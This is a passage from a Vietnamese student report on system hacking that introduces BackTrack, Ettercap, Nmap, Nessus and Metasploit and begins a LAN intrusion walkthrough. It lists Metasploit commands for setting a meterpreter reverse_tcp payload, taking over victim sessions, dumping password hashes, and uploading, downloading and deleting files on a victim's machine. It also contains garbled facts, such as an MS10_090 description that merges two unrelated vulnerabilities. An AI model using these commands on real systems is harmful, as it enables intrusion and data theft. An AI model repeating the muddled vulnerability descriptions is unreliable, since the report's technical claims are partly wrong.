và .NetFramework.
 Một số lỗ thổng đặc biệt thường bị khai thác: MS10_090, MS10_042,
MS12_027, MS10_046, MS10-046, MS12-004, MS08-067,……



Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
16

1.6. Công cụ sử dụng tấn công:
1.6.1. Hệ điều hành Backtrack 5 r3:


Hình 5: Giao diện sử dụng của backtrack 5 r3
Backtrack là một bảng phân phối dạng Live DVD của Linux, được
phát triển để thử nghiệm xâm nhập. Cung cấp cho người dùng dễ dàng
truy cập vào một bộ sưu tập toàn diện và lớn các công cụ bảo mật liên
quan đến nhau, từ máy quét cổng để kiểm toán an ninh. Hỗ trợ cho Live
CD và Live USB chức năng cho phép người sử dụng để khởi động
Backtrack trực tiếp từ phương tiện truyền thông di động mà không cần cài
đặt, dù lắp đặt cố định vào đĩa cứng và mạng cũng là một lựa chọn.
BackTrack sắp xếp các công cụ thành 12 loại:
 Thu thập thông tin
 Đánh giá tổn thương
 Công cụ khai thác
 Leo thang đặc quyền
 Duy trì truy cập
 Kỹ thuật đảo ngược
 Công cụ RFID
 Căng thẳng thử nghiệm
 Forensics
 Công cụ báo cáo
 Dịch vụ
 Hỗn hợp
Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
17

Câu lệnh thường sử dụng để tấn công trong Backtrack:
 #Username:root/password:toor : Thông tin đăng nhập
 #Startx : vào giao diện đồ họa
 #Dhclient –r : xóa thông số IP của máy
 #Dhclient eth0 : xin lại IP cho card eth0
 #Msfconsole : khởi động metasploit

 >Search xxx : tìm kiếm lỗ hổng xxx
 >Use x/y/z : sử dụng module , x/y/z là đường dẫn matching
module
 >Show options : kiểm tra các thuộc tính của mã lỗi.
 >Set srvhost A : A là IP máy backtrack
 >Set lhost A
 >Set lport B : B là port muốn mở, B phải khác các port của
hệ thống
 >Set payload windows/meterpreter/reverse_tcp
 >Exploit : tiêm mã độc.
 >Set filename abc : chỉnh tên file thành abc
 >sessions –i x : chiếm quyền điều khiển máy nạn nhân , x
là id sessions máy nạn nhân.
Câu lệnh sử dụng để điều khiển và khai thác tài nguyên:
 >getuid : xem thông tin hệ thống
 >sysinfo : xem thông tin hệ thống
 >upload /root/Desktop/abc.doc C:/ : tải file abc.doc từ
máy backtrack qua ổ C máy nạn nhân
 >download C:/xyz.doc /root/Desktop : tải file xyz.doc từ
máy nạn nhân về máy backtrack
 >haskdump : lấy hashpass
 >shell : khám phá ổ đĩa máy nạn nhân
 >cd C:\ : chuyển dấu nhắc ổ đĩa
 >dir : liệt kê tài nguyên trong ổ C
 >md abc : tạo thư mục abc trong ổ C
 >rd abc : xóa thư mục abc trong ổ C
 >del abc.txt : xóa file abc.txt trong ổ C
 >exit : thoát.




Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
18

1.6.2. Ettercap:
 Ettercap là một công cụ trung gian giữa các cuộc tấn công trong
mạng LAN. Nó có tính năng đánh hơi các các kết nối trực tiếp, lọc
nội dung chuyển trên mạng và nhiều thủ thuật thú vị khác. Nó hỗ trợ
mổ sẻ hoạt động và thụ động của nhiều giao thức (ngay cả với
Ciphered) và bao gồm nhiều tính năng cho mạng lưới phân tích và
máy chủ.
 Với Ettercap bạn có thể theo dõi những lưu lượng thông tin hoạt
động trên hệ thống mạng của bạn, chụp các thông tin, hiển thị và can
thiệp vào các kết nối, theo dõi các host đang trao đổi trên mạng.
 Hỗ trợ kỹ thuật tấn công Address Resolution Protocol (ARP)
spoofing hay còn gọi là ARP flooding, ARP poisoning hay ARP
Poison Routing (APR). Đó là cách tấn công từ một máy tính trong
mạng LAN, thông qua giao thức ARP và địa chỉ MAC, IP, nó nhằm
ngắt kết nối từ một hay một số máy tính với Modem, dẫn đến tình
trạng các máy tính đó không thể truy cập Internet.
 Ngoài ra còn dùng trong 1 kiểu tấn công MITM khác là giả mạo
DNS (DNS Spoofing) mà chúng ta sử dụng trong đề tài này.
1.6.3. Nmap (Network Mapper) và Nessus:
 Nmap là một tiện ích miễn phí kiểm toán an ninh. Zenmap (Công cụ
hỗ trợ đồ họa của nmap) được cài đặt sẵn trong BackTrack, sử dụng
các gói tin IP giúp xác định host nào có sẵn trên mạng, các dịch vụ
(tên ứng dụng và phiên bản) mà host đó đang cung cấp, hệ điều hành
gì (và các phiên bản hệ điều hành) mà họ đang chạy, loại bộ lọc gói
tin hoặc tường lửa nào đang sử dụng, và nhiều đặc điểm khác. Nmap
chạy được trên tất cả các hệ điều hành. Sau khi xác định được các

host có trong mạng, ta có thể sử dụng các công cụ quét lỗi hệ thống
để xác định lỗ hổng của hệ thống muốn xâm nhập, từ đó khai thác
truy cập vào hệ thống.
 Nessus là công cụ dùng để quét các lỗi hệ thống của các host trong
một hệ thống mạng LAN. Ta có thể download tại địa chỉ
www.nessus.org.
Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
19

1.6.4. Metasploit:
 Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về
vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thâm nhập và
phát triển hệ thống phát hiện tấn công mạng. Metasploit Framework
là một môi trường dùng để kiểm tra, tấn công và khai thác lỗi của các
service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng
Perl, với những components được viết bằng C, assembler, và Python.
Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux,
Windows, MacOS. Chúng ta có thể download chương trình tại
www.metasploit.com.
 Metasploit hỗ trợ nhiều giao diện với người dùng:
o Console interface: dùng lệnh msfconsole. Msfconsole interface sử
dụng các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm
dẻo hơn.
o Web interface: dùng msfweb, giao tiếp với người dùng thông qua
giao diện Web.
o Command line interface: dùng msfcli.
1.6.5. Máy chủ ảo (Virtual Private Server - VPS):
VPS là phương pháp phân chia một máy chủ vật lý thành nhiều
máy chủ ảo. Trong khi trên 1 server chạy Share Host thì có thể có hàng
trăm tài khoản cùng chạy 1 lúc, nhưng trên server chạy VPS thì con số

chỉ bằng 1/10. Do vây, VPS có hiệu năng cao hơn Share Host rất nhiều
lần.Hoạt động hoàn toàn như một server riêng nên sở hữu một phần
CPU riêng, dung lượng Ram riêng, dung lượng ổ HDD riêng, địa chỉ Ip
riêng và hệ điều hành riêng.
Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng
như các ứng dụng khác thì có thể cài đặt để thực hiện những nhu cầu
riêng như truy cập Web bằng trình duyệt Web trên VPS,
download/upload bittorent với tốc độ cao



Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking
20

2. Khai thác xâm nhập hệ thống trong mạng LAN:
2.1. Sơ đồ tổng quan hệ thống mạng LAN:

Hình 6: Sơ đồ hệ thống mạng LAN
Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với
khoảng cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty.
Các máy tính trong mạng LAN có thể chia sẻ tài nguyên với nhau, mà điển hình
là chia sẻ tập tin, máy in, máy quét và một số thiết bị khác. Khi một máy tính ở
trong mạng LAN, nó có thể sử dụng các chương trình, phần mềm quét hệ thống
mạng để biết được địa chỉ IP các host có trong mạng.
2.2. Tiến hành tấn công và khai thác lỗ hổng:
Trước khi quá trình tấn công diễn ra thì Attacker sẽ sử dụng các công cụ
Nmap hoặc Nessus để quét toàn bộ hệ thống mạng. Kiểm tra các lỗi hệ thống
của các hệ điều hành và dựa vào những lỗi đó để tấn công.( chi tiết cách sử
dụng Nmap và Nessus xem PHỤ LỤC 5: Sử dụng Nmap và Nessus)
2.2.1. Xâm nhập và khai thác lỗ hổng MS10_090:

a. Giới thiệu lỗ hổng MS10_090:
Các phiên bản Microsoft Internet Explorer 6, 7, and 8 cho phép
kẻ tấn công thực hiện mã lệnh thông qua Cascading Style Sheets
(CSS).
Lỗi này nằm trong cơ chế thực hiện mã hóa phiên làm việc của
ứng dụng web ASP.NET, dẫn tới việc kẻ tấn công có thể thăm dò để
tìm ra khóa giải mã trong một thời gian ngắn.

×